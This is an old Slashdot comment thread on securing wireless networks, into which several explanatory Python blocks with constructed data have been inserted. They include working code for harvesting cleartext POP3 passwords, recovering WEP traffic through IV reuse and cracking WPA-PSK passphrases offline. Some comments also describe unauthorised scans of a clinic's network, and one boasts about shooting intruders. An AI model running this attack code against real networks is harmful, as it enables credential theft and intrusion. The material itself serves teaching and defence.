Risk Management of Wireless Networks
An anonymous reader writes "As wireless becomes a bigger part of our networks, those of us charged with maintaining them find ourselves also responsible for keeping drive-by script kiddies with a Pringles can out. BankInfoSecurity.com is running an excellent article on identifying and mitigating risks on wireless networks. The article was written by members of the Office of the Comptroller of the Currency (OCC) for banks, but it's applicable to any network environment and clearly lays out all the key steps to protecting wireless systems." There's nothing new here, really, but it's a good overview of issues to keep in mind when building a wireless net, as well as a good security plan starting point.
I'm sorry, but banks should not be using wireless networks. Yes, yes, I realize wires are inconvenient, but they are much more secure. This is the customer's money and lives they're dealing with, not just some company secrets.
What's with the Pringles Can?
THOSE PESKY WARDRIVERS!!
I have great doubts that say, the government will ever allow sensitive or classified information to go on a wireless link, even if it is "secured".. there's just too much freedom in the air between origin and destination.
Fiber should continue to be used for any info that could be considered sensitive at all.. but then again, who am i kidding.. businesses just want things to be easy, not safe
--Less Thinkin', More Drinkin'...
I think that the problem is that there are a lot of people who are hearing of the WiFi craze, hearing that it is a good idea, and then setting up these adhoc networks. The problem is, they often don't bother to read up about the potential security risks of misconfiguration and so if (when?) they mess up, there's a wide open hole right there.
:-))
(And no, "wide open hole" isn't a goatse link.)
Slashdot: when news breaks, we give you the pieces.
The text has been modified. Search for "pig" in the text.
found here
uh, no it's not. AC Karma wh#@$...
Just have your wireless devices set to a DMZ that opens to one page, a VPN portal. Then you have a wireless connection, with VPN providing your security. Voila...a little bit more cumbersome, but isn't your network integrity worth it?
Security Practicum: Essential Home Wireless Security Practices
Slashdot Moderation: From positive to terrible in 2 "insightful" posts.
I've had some fun sniffing the network around the office, around town, and at O'Reilly OSXCon, and I think the biggest security risk I see on wireless networks are plaintext POP passwords going out in the clear.
It's amazing how many people who should know better are still using plain POP for grabbing their mail. Since most mail clients recheck for mail every few minutes, it's quite simple to grab passwords. Using those passwords, a hacker can then try the same password to enter the network, read the person's e-mail to do subsequent social engineering, or just fish around the person's e-mail for interesting information.
The second thing I think most people don't realize is that on a standard wireless network all the HTTP URLs they are surfing to with a web browser are public. This may not be a security risk, but companies also may not want a hacker in the parking lot to know that a server named secretinternaldata.mycompany.com exists.
I set up an SSH tunnel from my laptop to my squid proxy at home just for fun to see if I could fix the issue. It worked well, but of course it's not something the average end-user with a laptop on wireless could manage.
Anyway, that's my .02.
- "When you want something with all your heart, the entire universe conspires to give it to you" -Paulo Coelho
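The point above about POP passwords is easy to verify for yourself. The following is an added example, not code from the thread or from the OCC article: it walks the client side of a reassembled POP3 TCP stream and pulls out whatever credentials were sent in the clear, which is all a sniffer on an open wireless network has to do. The three session byte strings are constructed here for the demo, and the dictionary layout of the findings is my own choice.

```python
import base64

# Constructed client-to-server byte streams of three POP3 sessions (not real captures).
SESSION_USERPASS = b"USER alice\r\nPASS hunter2\r\nSTAT\r\nQUIT\r\n"
SESSION_AUTH_PLAIN = (
    b"AUTH PLAIN " + base64.b64encode(b"\x00bob\x00s3cret") + b"\r\nLIST\r\n"
)
# After STLS (RFC 2595) the rest of the stream is TLS records; the bytes here are filler.
SESSION_STLS = b"STLS\r\n\x16\x03\x01\x00\x2a\x01\x00\x00\x26\x03\x01"


def parse_pop3_client(stream: bytes) -> list:
    """Return the credentials an eavesdropper recovers from one POP3 client stream.

    Handles USER/PASS, AUTH PLAIN (inline or on the following line, RFC 4616
    layout: [authzid] NUL authcid NUL password) and APOP, and stops at STLS
    because nothing after that command is readable without breaking TLS.
    """
    findings = []
    user = None
    expect_plain_blob = False
    for raw in stream.split(b"\r\n"):
        if not raw:
            continue
        line = raw.decode("latin-1")
        if expect_plain_blob:
            expect_plain_blob = False
            findings.append(_decode_plain(line))
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "STLS":
            findings.append({"method": "STLS", "user": None, "password": None,
                             "note": "session upgraded to TLS; nothing further readable"})
            break
        if verb == "USER":
            user = arg
        elif verb == "PASS":
            findings.append({"method": "USER/PASS", "user": user, "password": arg})
        elif verb == "APOP":
            name, _, _digest = arg.partition(" ")
            findings.append({"method": "APOP", "user": name, "password": None,
                             "note": "MD5 digest only; guessable offline but not the cleartext"})
        elif verb == "AUTH":
            mech, _, blob = arg.partition(" ")
            if mech.upper() == "PLAIN":
                if blob:
                    findings.append(_decode_plain(blob))
                else:
                    expect_plain_blob = True  # client sends the blob after the server's "+"
    return findings


def _decode_plain(blob: str) -> dict:
    parts = base64.b64decode(blob).split(b"\x00")
    return {"method": "AUTH PLAIN",
            "user": parts[1].decode("utf-8", "replace"),
            "password": parts[2].decode("utf-8", "replace")}


if __name__ == "__main__":
    for name, s in (("USER/PASS", SESSION_USERPASS),
                    ("AUTH PLAIN", SESSION_AUTH_PLAIN),
                    ("STLS", SESSION_STLS)):
        print(name, parse_pop3_client(s))
```

Note that AUTH PLAIN is no better than USER/PASS on the wire; base64 is an encoding, not encryption. Only the STLS session (or POP over a TLS port) keeps the password out of the sniffer's hands, which is why the mail-only-password workaround mentioned later in the thread only limits the damage rather than preventing it.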
Can you take a Linksys (or any other brand) 4 port wireless router and simply disable the wireless ability of it and just use it as a standard wired 4 port router?
Why? I don't need wireless ability now (I just use normal wired ethernet), but may need wireless in the future.
Disclaimer: I work in Information Security.
But, by all means:
We now return you to your regularly scheduled programming.
I for one, welcome our new OCC over lords.
I couldn't resist.
I shall now bathe in the cleansing flame.
"You should always go to other people's funerals; otherwise, they won't come to yours." -- Yogi Berra
But for what reason does a bank need wireless access? In environments that could benefit (warehouses and such), there are ways to help limit how far the signal gets. Most warehouses have cinder block or steel panel walls; you could also add some grounded chicken wire or some meshed metal wiring to the exterior walls to keep the signal from escaping the building... just fyi
Politics, Life, and More on my Aspiring for the Future
I saw only a tiny blurb about WPA, which should be a primary consideration for banks and credit unions analyzing the risk of wireless.
WPA has stronger encryption than WEP and authentication mechanisms built in. I work for a Credit Union processing/software company, and many financial institutions are waiting for WPA to become more mature before they jump into wireless.
For more info, google, or check this out.
The switch has all inline power ports to power the APs, which may or may not be directly connected. Each AP automatically creates an IPSEC tunnel back to the switch. The switch supports every auth method under the sun (EAP-TTLS being generally most secure) when combined with 802.1x (which includes dynamic WEP/WPA 2.0). The switch itself supports a per-user firewall, integrated, signature-based IDS (that detects things like monkeyjack and netstumbler), and terminates 2 Gbps of IPSEC (which includes the IPSEC client running on each user's machine).
All of this for a couple of grand. Secure wireless is possible, the market is demanding it, and vendors have come to meet that demand.
I agree 100%.
The hoopla about physical access security obscures the point that *all* internet traffic and most intranet traffic is viewable by others. It is a good idea to assume that all your networks are open and to use VPN, ssh, etc. to secure your data. And *never* send plain-text passwords.
If you lock your data down under this assumption (that all network traffic may be intercepted) the impetus for clunky and insecure wireless access restrictions is much diminished.
used to use WiFi between its checkouts and inventory system. No encryption, SSID broadcasts were switched on and everything, to the extent that we used to sit in the car park and surf the web via their connection for hours on end on Saturday afternoons.
This was a good 18 months ago though. I'd assume they've changed it now. I certainly made a point of telling them why I wasn't shopping there any more, rather than doing the whole 'your network is totally insecure and I found out why' thing and getting myself arrested...
If you're smart when you set up your access point, and turn on WEP, 99.9% of people that might hack your network are going to go find an easier target. The typical figure I've heard is 24 hours or more to get enough traffic to break the encryption. Unless someone knows you have something they want, they're not going to bother.
Home users are going to generate less traffic than businesses, and so it will take even longer to get enough traffic. Unless you happen to notice a van parked outside your house for a couple days, or find yourself staring down the barrel of a pringles can, you can relax.
Turn off SSID broadcasting
use a unique SSID
For God's sake, change the admin password
Turn on WEP
Use MAC address filtering
Congratulations, you're now more trouble than you're worth.
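The list above turns on WEP and assumes an attacker needs a large traffic sample. What the traffic sample buys the attacker comes down to WEP's 24-bit per-packet IV: the IV is sent in the clear, it is prepended to the shared key to form the RC4 key, and any two frames that reuse an IV are encrypted with the same keystream. The following is an added example (not from the thread or the OCC article) with a toy WEP encryptor, an attacker-side recovery that needs no key at all once one frame's plaintext is guessable, and the birthday bound for how many frames a busy network sends before an IV repeats. The key, IV and frame contents are constructed for the demo; 802.11 headers and fragmentation are left out.

```python
import math
import zlib

IV_BITS = 24  # WEP's per-packet IV is 24 bits and travels in the clear


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (key scheduling + PRGA), returning n keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Simplified WEP frame body: IV || RC4(IV || key)(plaintext || CRC-32 ICV)."""
    assert len(iv) == 3
    body = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + xor(body, rc4_keystream(iv + shared_key, len(body)))


def wep_decrypt(shared_key: bytes, frame: bytes):
    """Legitimate receiver: returns (plaintext, icv_ok)."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + shared_key, len(ct)))
    pt, icv = body[:-4], body[-4:]
    return pt, zlib.crc32(pt).to_bytes(4, "little") == icv


def recover_with_reused_iv(frame_known: bytes, known_pt: bytes, frame_target: bytes) -> bytes:
    """Attacker side, no key needed. Two frames with the same IV share a keystream,
    so keystream = C1 xor (P1 || ICV(P1)) and the target frame decrypts by XOR.
    Only as many bytes as the known plaintext covers are recovered."""
    assert frame_known[:3] == frame_target[:3], "demo needs a reused IV"
    known_body = known_pt + zlib.crc32(known_pt).to_bytes(4, "little")
    keystream = xor(frame_known[3:], known_body)
    return xor(frame_target[3:], keystream)[: len(known_pt)]


def iv_collision_probability(packets: int) -> float:
    """Birthday bound: probability that at least one IV repeats among `packets`
    frames when IVs are chosen at random from the 2^24 space."""
    return 1.0 - math.exp(-packets * (packets - 1) / (2.0 * 2 ** IV_BITS))


# --- constructed demo data: a 40-bit key and two frames that share IV 0x000000 ---
KEY = bytes.fromhex("0102030405")
IV = b"\x00\x00\x00"
P1 = b"USER alice\r\n"   # predictable POP3 command: a good known-plaintext guess
P2 = b"PASS hunter2"     # the secret the eavesdropper is after (constructed)
C1 = wep_encrypt(KEY, IV, P1)
C2 = wep_encrypt(KEY, IV, P2)

if __name__ == "__main__":
    print("receiver decrypts C1:", wep_decrypt(KEY, C1))
    print("attacker recovers P2 without the key:", recover_with_reused_iv(C1, P1, C2))
    print("P(IV collision) after 4823 random-IV frames: %.2f" % iv_collision_probability(4823))
    print("sequential IVs wrap after %d frames" % 2 ** IV_BITS)
```

With random IVs the collision probability passes 50% after roughly 4,800 frames, which a single busy client produces in minutes; with sequential IVs a reset card starts at zero again. Either way the attacker's work is a known-plaintext XOR, and protocol headers and commands like USER are exactly the kind of plaintext that is easy to guess. The same key also feeds the statistical key-recovery attacks the thread alludes to, which is why WEP only raises the bar against people who do not care which network they get into.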
found here
If you are responsible for a company's security, you should regularly search for wireless nodes within your organization which you are not aware of WHETHER OR NOT you are using wireless as policy.
I have been asked to assess companies and offered a wireless audit. They said "we don't use wireless". I checked anyway, and it turned out they DID have wireless (but didn't know about it) thanks to, in one instance, a laptop acting as an AP and in another, a sysadmin who figured he'd plug in a wireless AP with built-in switch instead of a hub or switch, and wireless was turned on. This is all the more problematic as the laptop and wireless device were both inside the firewall and therefore represented a major hole.
Intruders may also leave wireless devices behind to save coming onto the site for subsequent eavesdropping. That is, they will bring your network to them rather than bringing themselves to your network.
In any case, fire up your stumbling application, a GOOD antenna and have a look around your own environment. You may be surprised what you see!
Do you or your partner snore? - Visit www.snoring.com.au
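Doing the survey the post recommends is mostly a matter of comparing what a scan sees against what the network team deployed. The following is an added example, not from the thread: it parses the `iwlist <iface> scan` text layout of the Linux wireless tools (the same package as the iwconfig mentioned elsewhere in the thread; the parser assumes that layout) and flags cells that are not in an inventory of authorized BSSIDs. The scan output, the inventory and the BSSIDs are constructed for the demo. Signal strength is used as a rough on-premises filter; a survey done with the "GOOD antenna" the post mentions would lower that threshold.

```python
import re

# Constructed inventory: BSSID -> SSID for the APs the network team actually deployed.
AUTHORIZED = {
    "00:0c:41:aa:bb:01": "corp-wlan",
    "00:0c:41:aa:bb:02": "corp-wlan",
}

# Constructed `iwlist scan` output (format only; none of these cells is real).
SAMPLE_SCAN = """\
          Cell 01 - Address: 00:0C:41:AA:BB:01
                    ESSID:"corp-wlan"
                    Encryption key:on
                    Quality=60/70  Signal level=-48 dBm
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 02 - Address: 00:13:10:DE:AD:01
                    ESSID:"linksys"
                    Encryption key:off
                    Quality=65/70  Signal level=-41 dBm
          Cell 03 - Address: 00:0C:41:AA:BB:02
                    ESSID:"corp-wlan"
                    Encryption key:on
                    Quality=40/70  Signal level=-70 dBm
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 04 - Address: 00:02:2D:CA:FE:01
                    ESSID:"corp-wlan"
                    Encryption key:on
                    Quality=55/70  Signal level=-52 dBm
          Cell 05 - Address: 00:90:4B:12:34:56
                    ESSID:"neighbour"
                    Encryption key:on
                    Quality=20/70  Signal level=-88 dBm
"""

CELL_RE = re.compile(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})")
SIGNAL_RE = re.compile(r"Signal level=(-?\d+) dBm")


def parse_iwlist(text: str) -> list:
    """Turn iwlist scan text into one dict per cell."""
    cells = []
    cur = None
    for line in text.splitlines():
        line = line.strip()
        m = CELL_RE.match(line)
        if m:
            cur = {"bssid": m.group(1).lower(), "ssid": "", "encrypted": False,
                   "wpa": False, "signal": None}
            cells.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("ESSID:"):
            cur["ssid"] = line[len("ESSID:"):].strip('"')
        elif line.startswith("Encryption key:"):
            cur["encrypted"] = line.endswith("on")
        elif line.startswith("IE:") and "WPA" in line:
            cur["wpa"] = True  # WEP cells show "Encryption key:on" but no WPA/802.11i IE
        else:
            m = SIGNAL_RE.search(line)
            if m:
                cur["signal"] = int(m.group(1))
    return cells


def triage(cells: list, authorized: dict, min_signal: int = -75) -> list:
    """Return (bssid, reason) for every cell that needs a human to look at it."""
    our_ssids = set(authorized.values())
    flagged = []
    for c in cells:
        if c["bssid"] in authorized:
            if c["ssid"] != authorized[c["bssid"]]:
                flagged.append((c["bssid"], "authorized AP advertising the wrong SSID"))
            continue
        if c["signal"] is not None and c["signal"] < min_signal:
            continue  # too weak to be on the premises; probably the neighbours
        if c["ssid"] in our_ssids:
            flagged.append((c["bssid"], "unknown AP advertising our SSID (rogue or evil twin)"))
        elif not c["encrypted"]:
            flagged.append((c["bssid"], "open AP in range"))
        elif not c["wpa"]:
            flagged.append((c["bssid"], "WEP-only AP in range"))
        else:
            flagged.append((c["bssid"], "unknown AP in range"))
    return flagged


if __name__ == "__main__":
    for bssid, reason in triage(parse_iwlist(SAMPLE_SCAN), AUTHORIZED):
        print(bssid, reason)
```

The laptop-as-AP and the "I just plugged in the AP with the built-in switch" cases from the post both show up as the last two categories; the fourth cell is the one that deserves the fastest response, because a device using your SSID from a BSSID you never deployed is either a misconfiguration or someone's bait.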
This all being said from somebody who logs into their favorite geek news site without the faintest bit of encryption!
The problem with plaintext POP passwords is that many ISPs (mine included) do not offer any other option. I wish they would, but they do not.
Thus, I just choose a mail-only password that I use for POP access. I guess a hacker could read my e-mail and maybe even send mail as me, but I've done what I can to minimize the risk of stupidly designed mailservers.
Pinball, arcade video, tech and more: www.micsaund.com
Never mind the professional hackers with a 12 dB antenna engaged in corporate espionage...
I mean seriously, I think the scR1pt k1Dd13 n00bs are the least of our problems.
Yeah, I see a lot of people stuck like that with insecure POP, and a lot of people who use the same password for their home account (which is almost always POP only) as they do for their work account. Bad bad bad.
One thing you could do, if you want to be a bit more secure, is to port forward port 110 using SSH to a server at home. Your POP password is still going out in the clear then, but it's going in the clear from your house, which is presumably more secure than going out over open wireless.
the tunnel would be something like this:
ssh -L 110:www.yourhomeserver.com:110 -f -N yourname@www.yourhomeserver.com
Here's a howto that goes into a little more depth.
I know this is off the subject but..
My company has recently begun implementing wireless networks, using all Cisco equipment.
Based on my reading, it looks like you should only use Spanning Tree Protocol with wireless bridges, not with access points. Why is this?
What's the difference between a wireless access point and a wireless bridge?
I just got a wireless Ad-Hoc network using iwconfig on Linux.
How do I tell iwconfig not to broadcast the essid?
He'd left it open to facilitate use by visitors, but no longer.
Mencken had it right. So glad that's old news.
many ISPs do not offer any other option
Use your ISP for connectivity and spend $30-35 a year for a better mail service.
For less than 3 bucks a month, you might even get HTTPS webmail thrown in ... some extra storage ... and one of those "lifetime" domain names that gives you some flexibility regarding additional accounts and spam control.
If email matters to you, it is doubtful you can find an ISP for twice the price that gives you mail security and your current level of non-mail speed and features (how most people pick their provders).
Finally!
/.ers, WPA is the way to go. (Until I can get ".x" on my Ethernet...)
All this talk of MAC-address locking, SSID changes, WEP key rotation. (All good steps if you can't use WPA)
And WPA fixes (almost) everything.
So while I give flinxmeister "The Hammer" for hitting the nail on the head, I've got to add my voice to the general theme, BANKS should NEVER go wireless.
Historic building? Asbestos? Cutting quarterly costs to make bonus targets? Fuggedaboutit. There ain't no "safe" wireless vis a vis any financial institution.
But for the rest of us, get the upgrades in place
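Since several posts here pin their hopes on WPA, it is worth seeing what WPA-PSK actually does with the passphrase, because that is where the "unique SSID" advice in this thread and the "long passphrase" advice belong. The following is an added example (not code from the thread or from any vendor): the PMK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, the PTK is derived from the PMK plus the two MAC addresses and the two nonces of the 4-way handshake, and the MIC on handshake message 2 is an HMAC under the first 16 bytes of the PTK. Everything an attacker needs to check a passphrase guess is therefore in one captured handshake, and the last function runs exactly that offline check. The MAC addresses, nonces, EAPOL frame bytes, passphrase and wordlist are constructed for the demo; the "password"/"IEEE" pair in the test is the published 802.11i test vector.

```python
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK for WPA/WPA2-PSK: PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt, 32 bytes out."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, nbytes: int = 48) -> bytes:
    """PTK from the PMK and the public handshake values (AP MAC, station MAC, both nonces).
    48 bytes for CCMP; TKIP uses 64. The first 16 bytes are the KCK that keys the MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes, descriptor_version: int = 2) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field set to zero.
    Descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) HMAC-SHA1; 16 bytes either way."""
    digest = hashlib.sha1 if descriptor_version == 2 else hashlib.md5
    return hmac.new(kck, eapol_frame_mic_zeroed, digest).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_frame, captured_mic, wordlist):
    """Offline attack: rebuild the MIC for each guess and compare with the captured one.
    Nothing here talks to the AP; the cost is two PBKDF2 runs' worth of work per guess."""
    for guess in wordlist:
        kck = wpa_ptk(wpa_pmk(guess, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return guess
    return None


# --- constructed handshake: what the AP and station compute, and what a sniffer sees ---
SSID = "corp-wlan"
PASSPHRASE = "letmein123"                       # constructed, deliberately weak
AA = bytes.fromhex("000c41aabb01")              # AP MAC (constructed)
SPA = bytes.fromhex("00e018cafe42")             # station MAC (constructed)
ANONCE = bytes(range(32))                       # constructed nonces; real ones are random
SNONCE = bytes(range(32, 64))
# Constructed EAPOL-Key message 2 body with the 16-byte MIC field zeroed; only its
# bytes matter to the HMAC, not whether every field is set the way a real frame would.
EAPOL_MSG2 = (b"\x01\x03\x00\x75\x02\x01\x0a\x00\x00\x10" + b"\x00" * 8 + SNONCE
              + b"\x00" * 48 + b"\x00" * 16 + b"\x00\x00")
CAPTURED_MIC = eapol_mic(wpa_ptk(wpa_pmk(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16],
                         EAPOL_MSG2)
WORDLIST = ["password", "qwerty12", "letmein123", "correct horse battery"]

if __name__ == "__main__":
    print("PMK:", wpa_pmk(PASSPHRASE, SSID).hex())
    print("cracked:", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_MSG2, CAPTURED_MIC, WORDLIST))
```

Two things follow for anyone deploying it. The SSID is the salt, so a default SSID means an attacker can precompute PMKs for a wordlist once and reuse them against every network with that name; a unique SSID forces the 4096-round PBKDF2 per guess per network. And the check never touches the AP, so account lockouts and intrusion detection do not help; the passphrase's entropy is the only thing standing between the captured handshake and the key. WPA-Enterprise (802.1X with per-user credentials) sidesteps this by not deriving the PMK from a shared passphrase at all.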
Does anyone have instructions on how to make a foil beanie for my wireless router to tremble under????
Well, you certainly sound more sane than the prior post....and I appreciate that hammer!
;)
However, remember the title of the article: "Risk management". There is no safe way of banking or doing business...period. There are only various shades of grey. As long as a financial institution understands the risks and takes appropriate steps to mitigate the risks and shield their customers/members from damage, they can implement a given technology. The question this thread seems to be encountering is "what is the level of risk that is impossible to mitigate". I submit that a wireless network with WPA and some other tricks falls well within the realm of manageable risk.
When you use an ATM, or buy something on the 'net, or give your personal check to someone, or use internet banking, or give someone your social security number, you are engaging in far, far more risk than if your FI uses a properly secured wireless network.
Did you know that your entire financial history is routinely fedexed on a tape? Did you know that there's a 99% chance that your financial data is routinely transmitted through multiple telecom companies unencrypted? Did you know that there is a good chance your paycheck is transmitted via a very secure, but very DDOSable single Federal Reserve website?
Trust me or don't, a loan officer on a car lot using a properly secured WPA implementation to loan you money is perfectly safe compared to the risk you are exposed to every day by simply existing as a financial being.
But before you put all your money into your mattress, manage the risk of a house fire.
I wish there was a way for me, as a Christian, as a human being, to sit down with some of you and have a pleasant, civil discussion without bitterness or sarcasm. I don't force people to believe what I believe. I don't mock others with different beliefs. I hope I can find the words to explain myself, as my life goes on. I hope I can help people to see.
I would like to use encrypted passwords but most providers do not have an encrypted password feature for POP3 on their side. :(
Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
Guilty as charged. This is a public forum and I have transmitted no data to it that I consider sensitive. I assume that my Slashdot password may be compromised - that may let you impersonate me here but it won't get you into my bank or my paypal account, or my personal computer for that matter.
So, for kicks, I took my libretto to the office on my next visit and fired up kismet.
They are wide open. No WEP, Windoze boxes (including the domain controllers) all easily accessible. A quick port scan showed all types of vulnerable services and such. I did not take the time to go further, but figure that getting patient records would not be too difficult.
From the port scans, it seems that this small office is also on the same subnet as other businesses in the area. WTF???
So what is one to do? I dare not tell them what I found, what with the risk of being labeled a terrorist and all. I thought that an anonymous letter to them might be best. But how can I be sure that they ever fix the problem?
I am aware of the dangers of wireless; it's becoming the top networking solution for homes and small business. A simple drive around town yields 80+% open networks. There is a solution though. It will eventually cost money(a) and it will be a long process but it will work.. Simply create and air a PSA on local television. By law they have to run them and they are free to run; you only have production cost(a(depending on scale and quality will determine the cost)) and that is a non-issue really. A good PSA that runs like tobacco ads will start working when you show what can happen to an open wireless network.. All in 30 seconds:)
Tell him... gently.
Explain to him that you're a hardcore networking geek with an interest in security, and that you often run security checks against your own systems. You were there, running one just for kicks, and voila! You are a patient of his presumably, so you already have a relationship and rapport... it would be different if you were some Joe Blow off the street who came waltzing into his office running kismet on your Zaurus.
He probably has NO CLUE that whoever set up his network has left it open to be plundered (tech-savvy doctors are rare. Thinking about all my colleagues, I can count the tech-savvy on one hand).
Take him aside privately, and explain to him that you were hesitant to come forward (for obvious reasons... like being labeled a cracker), but that you really felt he should know what was up, not only for the security of your own medical records, but also for the security of everyone else's. Heh... he might even hire you to help fix it.
You will likely find him VERY receptive if you approach him the right way. I'm quite certain he contracts his IT stuff out to somebody, so he probably has ZERO emotional investment in the security of his network... he just wants it to work, and pass HIPAA muster (which it probably doesn't right now).
I bet he'd be receptive.
Even if a man chops off your hand with a sword, you still have two nice, sharp bones to stick in his eyes.
We have none in our offices.
But those cordless phones in use are a yes yes...?
The simplicity of the problem is compounded by the complexity of the solution.
This lawyer runs a WIFI hotspot for his office. All boxes have decent firewalls and the CPUs are all off-line after hours (e.g. whenever we are not working late).
.40 cal in is Sig Sauer over 9mm.
I don't care about free riders. I want a few. Let the RIAA claim I have downloaded anything. . . I haven't and neither have my staff. BUT I would love the accusation.
The client data and the electronic filings are all encrypted (PGP on office systems or SSL in submission to the federal courts where most become a public record) and so is all email.
Other than that Canadian idiot who was found with his pants off and kiddie crap on his laptop, I have no worries.
I also have an office in a small town near a big city in the midwest. I know my town's mayor, elected officers and police. I also have my fly rods, shotguns and a single handgun in the 114 year old building.
The first idiot that runs into the building nekked with kiddie pr0n on his laptop can elect the 9mm or the Parker exit. There will be no alternative. The time frame will be a few milliseconds (police are a two clicks away, fire station 50 M).
Either way, he is history (strange that there are no women who act this dumb). I doubt that the inquest would go beyond the coroner. He needed killing.
If we were lucky enough to whack a "sting", so much the better! There is no defense to downloading kiddie pr0n and killing that sick f**k too quickly may be the only liability.
The endodontist in town has the same view, though he favors frangible
Meanwhile, let the RIAA accuse me of downloading anything. I'd love it! I'd sue them up, down and each attorney individually and I'd prefer ethics charges as well. I can only hope that we draw one or the other to our little trap. Meanwhile, any student or local who needs a quick link to the Internet can enjoy our on-ramp.
I see nothing (aside from the pr0n free riders) negative about an open wifi access point.
One particularly annoying connection gave me a 192.168.1 address and let me ping 192.168.1.1 but do absolutely nothing else. I ran nmap and nessus against the IP and absolutely nothing came back. It was the freakiest thing I've ever seen. It's like someone bought a Linksys and powered it up without attaching it to anything else on the internal or external side.
;-)
Most likely, neither solution is correct. The WIN box sharing the internet connection is in BSOD and nobody noticed it yet.
The truth shall set you free!
The router would like you much better if you replaced the antenna with a proper (microwave not CB band) 50 ohm dummy load. It is possible to feed a stub of tin foil and it could radiate the signal. A dummy load in a coaxial fitting provides a load on the transmitter preventing high standing waves which can produce high current or high voltage nodes in the router which radiate the signal.
The problem is that some WiFi devices can't connect to an AP if it does not broadcast the SSID.
I got two USB WiFi devices and they would not work until I re-enabled SSID broadcasting.
When you buy devices it is not obvious if they will work without the SSID being broadcast.
Perhaps a compilation of devices that are more secure should be gathered somewhere.
IANAL but write like a drunk one.
The zero-risk to yourself approach is to do nothing. Next up is the anonymous letter, and the continuum extends right up to admitting you've used their network...your choice where you draw the line.
I'm not trolling here - I'm completely serious. Wireless networks offering access to the Internet using existing 802.11 security mechanisms should be illegal.
This crowd seems to be thinking only of security against direct attack - but by FAR the greater problem is "third-party liability". If someone uses your wireless network to attack a third party, YOU are liable for the damages.
In a time when we're all fighting spammers and other attackers, the morons out there installing wireless networks are giving attackers the greatest tool they've ever had - free, untraceable, high-bandwidth network access.
Do your part - turn OFF every existing wireless lan. Demand 802.1x security mechanisms. (The 802.1x standard, although still in draft form, has already been implemented as part of Cisco Wireless Security Suite.)
The only valid security mechanisms for 802.11x WLANs to be developed so far ALL require client behavior that is outside the scope of the 802.11x standards. There is no such thing as a standards-only, secure 802.11 network.
Security in 802.11x will come from the incorporation of 802.1x - that's not a typo - 802.1x is a security standard that fixes all of the problems with existing wireless security techniques and is meant to be the foundation for future enterprise network security.
Don't think "WPA" is a solution either - it's already been cracked as well. The only solution in the foreseeable future is 802.1x. Push for it. Push back AGAINST the stupid wireless networks that are presently jeopardizing the entire Net.
Hence my admonition... it's all in the presentation.
Physicians are insanely busy people... busy taking care of patients, busy dealing with insurance companies, busy trying to comply with govt. regulations. No doctor has a legal department sitting on its hands with nothing to do, just waiting to prosecute/sue a patient who happens to fire up his laptop in the waiting room and inadvertently pick up the open AP. The original poster is a patient of that physician, and did not hack into the open network.. he simply found it.
Prosecuting your own patient (who was trying to do the right thing by informing the doctor of a big confidentiality problem) would play VERY POORLY in the local newspapers... physicians have a professional reputation to uphold, one that's more valuable than gold. Prosecuting your own patient for trying to help you looks pretty shitty, even to a non-techie layman... and the doctor can't afford to hire a public relations firm to repair his damaged reputation, unlike {insert your favorite MegaCorp here}.
In a way, the original poster is not only helping the doctor, he's helping assure the safety of his own medical records (which he arguably has the right to do). Also consider that if he discusses this matter during the course of a patient visit, that communication could be considered privileged, and NOT admissible as evidence without the patient's consent. Also, there's the small matter of getting a prosecutor to pursue the case, and a jury to convict...
I stand by my comments.
Interesting history you have of trolling on your own trolls. Fucker.